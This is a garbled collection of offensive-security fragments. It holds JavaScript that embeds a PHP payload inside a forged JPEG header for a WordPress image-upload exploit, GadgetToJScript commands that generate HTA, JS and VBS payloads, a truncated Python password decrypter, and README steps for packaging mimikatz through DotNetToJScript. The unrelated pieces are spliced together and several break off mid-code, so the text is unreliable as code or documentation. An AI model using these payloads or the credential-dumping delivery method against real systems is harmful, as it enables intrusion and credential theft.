var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length;
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript
import argparse


class Decrypter:
    SIMPLE_STRING = "0123456789ABCDEF"
    SIMPLE_MAGIC = 0xA3

    def __init__(self, password):
        self.data = password

    def next(self):
It is basically a wrap of the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
  Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (you may want to comment out the Exec() line, though)
   b) It is going to produce a file.b64, so copy its content and replace the Delivery.Package.file string with it
package main

//#include "dllmain.h"
import "C"